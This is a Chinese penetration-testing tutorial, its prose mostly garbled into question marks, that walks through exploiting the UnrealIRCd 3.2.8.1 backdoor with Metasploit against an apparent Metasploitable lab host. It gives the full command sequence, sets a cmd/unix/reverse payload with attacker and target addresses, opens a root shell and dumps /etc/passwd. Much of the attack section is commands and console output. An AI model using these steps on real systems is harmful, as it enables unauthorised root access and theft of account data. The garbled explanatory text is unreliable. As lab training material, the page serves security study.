????λ?????????? >> ??????????
???????????????Nmap
???????????? ???????[ 2015/9/11 10:55:02 ] ?????????????????? ??????
?????????4-3????MSF?????????????Unreal IRC????????????????Metasploit 2?????????????????192.168.6.105??????????????????????
??????1?????MSF????????????????????
????root@kali:~# msfconsole
????msf>
????????????????????msf>???????????????MSF????
??????2?????Unreal 3.2.8.1?????????顣????????????????
????msf > search Unreal 3.2.8.1
????Matching Modules
????================
????Name Disclosure Date Rank Description
????---- --------------- --------------- ---------------------------
????exploit/linux/games/ut2004_secure 2004-06-18 good Unreal Tournament 2004 "secure" Overflow (Linux)
????exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution
????exploit/windows/games/ut2004_secure 2004-06-18 good Unreal Tournament 2004 "secure" Overflow (Win32)
???????????????У???????????????????????顣????????????unreal_ircd_3281_backdoor??飬????????????á?
??????3????unreal_ircd_3281_backdoor??飬???????????????????????????????????
msf > info exploit/unix/irc/unreal_ircd_3281_backdoor
Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution
Module: exploit/unix/irc/unreal_ircd_3281_backdoor
Platform: Unix
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
hdm <hdm@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic Target
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 6667 yes The target port
Payload information:
Space: 1024
Description:
This module exploits a malicious backdoor that was added to the
Unreal IRCD 3.2.8.1 download archive. This backdoor was present in
the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th
2010.
References:
http://cvedetails.com/cve/2010-2075/
http://www.osvdb.org/65445
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
???????????????У????????????unreal_ircd_3281_backdoor???????????????У???????????????????????????????????ü???????????
??????4????????unreal_ircd_3281_backdoor??飬???????????????????????????????????????
????msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
????msf exploit(unreal_ircd_3281_backdoor) > show options
????Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
????Name Current Setting Required Description
????---- --------------- -------- -----------
????RHOST yes The target address
????RPORT 6667 yes The target port
????Exploit target:
????Id Name
????-- ----
????0 Automatic Target
?????????????У???????????????????????????????????RPORT??????????????????????????RHOST??
??????5??????RHOST????????????????????????
????msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.6.105
????RHOST => 192.168.6.105
?????????????У???????????????????????192.168.6.105??
??????6???????п???????????ɡ?????????????????
????msf exploit(unreal_ircd_3281_backdoor) > show payloads
????Compatible Payloads
????===================
????Name Disclosure Date Rank Description
????------------------------------------ ------------------------ ------------- -----------------
????cmd/unix/bind_perl normal Unix Command Shell?? Bind TCP (via Perl)
????cmd/unix/bind_perl_ipv6 normal Unix Command Shell?? Bind TCP (via perl) IPv6
????cmd/unix/bind_ruby normal Unix Command Shell?? Bind TCP (via Ruby)
????cmd/unix/bind_ruby_ipv6 normal Unix Command Shell?? Bind TCP (via Ruby) IPv6
????cmd/unix/generic normal Unix Command?? Generic Command Execution
????cmd/unix/reverse normal Unix Command Shell?? Double Reverse TCP (telnet)
????cmd/unix/reverse_perl normal Unix Command Shell?? Reverse TCP (via Perl)
????cmd/unix/reverse_perl_ssl normal Unix Command Shell?? Reverse TCP SSL (via perl)
????cmd/unix/reverse_ruby normal Unix Command Shell?? Reverse TCP (via Ruby)
????cmd/unix/reverse_ruby_ssl normal Unix Command Shell?? Reverse TCP SSL (via Ruby)
????cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell?? Double Reverse TCP SSL (telnet)
????????????????????unreal_ircd_3281_backdoor????п??????????ɡ????????????????????????????Щ????????????????Shell?????????????Meterpreter shell????????????????÷?Shell?????????????????????????Shell???????????
??????7????÷?Shell?????????????????????reverse?????????????????????????????????????????????????
????msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
????payload => cmd/unix/reverse
????msf exploit(unreal_ircd_3281_backdoor) > show options
????Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
????Name Current Setting Required Description
????---- --------------- -------- -----------
????RHOST 192.168.6.105 yes The target address
????RPORT 6667 yes The target port
????Payload options (cmd/unix/reverse):
????Name Current Setting Required Description
????---- --------------- -------- -----------
????LHOST yes The listen address
????LPORT 4444 yes The listen port
????Exploit target:
????Id Name
????-- ----
????0 Automatic Target
??????????????У????????LHOST??????δ???á?
??????8??????LHOST????????????????????????
????msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.6.103
????LHOST => 192.168.6.103
??????????????????β??????????????????????????????????????
????msf exploit(unreal_ircd_3281_backdoor) > show options
????Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
????Name Current Setting Required Description
????---- --------------- -------- -----------
????RHOST 192.168.6.105 yes The target address
????RPORT 6667 yes The target port
????Payload options (cmd/unix/reverse):
????Name Current Setting Required Description
????---- --------------- -------- -----------
????LHOST 192.168.6.103 yes The listen address
????LPORT 4444 yes The listen port
????Exploit target:
????Id Name
????-- ----
????0 Automatic Target
???????????????У????????????????????á?????????????й??????
??????9??????????????????????????????
????msf exploit(unreal_ircd_3281_backdoor) > exploit
????[*] Started reverse double handler
????[*] Connected to 192.168.6.105:6667...
????:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
????[*] Sending backdoor command...
????[*] Accepted the first client connection...
????[*] Accepted the second client connection...
????[*] Command: echo 4G58mrIzlfNG2zIm;
????[*] Writing to socket A
????[*] Writing to socket B
????[*] Reading from sockets...
????[*] Reading from socket B
????[*] B: "4G58mrIzlfNG2zIm "
????[*] Matching...
????[*] A is input...
????[*] Command shell session 1 opened (192.168.6.103:4444 -> 192.168.6.105:53656) at 2014-07-16 09:34:05 +0800
???????????????У????????????????????????????н????κ?Shell??????????????????????????????????????????????Shell?????????????κα????Linux??????磬??????????????????????????????????????
????whoami
???????????????????????????????????
????root
????????????????????????????????????????root??
?????????????????????????????????????????
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin??????:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator??????:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server??????:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user??111????:/home/user:/bin/bash
service:x:1002:1002:??????:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
??????????????????????????е?????????????????????Щ?????????????????????????
???????????????????????漰???????????????????SPASVOС??(021-61079698-8054)?????????????????????????
??????
Nmap????ò???????л??°???msf??nmap??????????Nmap?????????????Nmap??????????????棩Linux???????????nmap?????Python-Nmap??ü???????????Nmap????????LazyMap????Nmap??貢??????Python????Nmap???????Nmap????????????Nmap????????????????????Nmap???????kali?????????????????nmap?????Nmap????????&????????Nmap???????optionPython????Nmap??????????????????xml
???·???
??????????????????
2023/3/23 14:23:39???д?ò??????????
2023/3/22 16:17:39????????????????????Щ??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???·???????·
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11????????
?????????App Bug???????????????????????Jmeter?????????QC??????APP????????????????app?????е????????jenkins+testng+ant+webdriver??????????????JMeter????HTTP???????Selenium 2.0 WebDriver ??????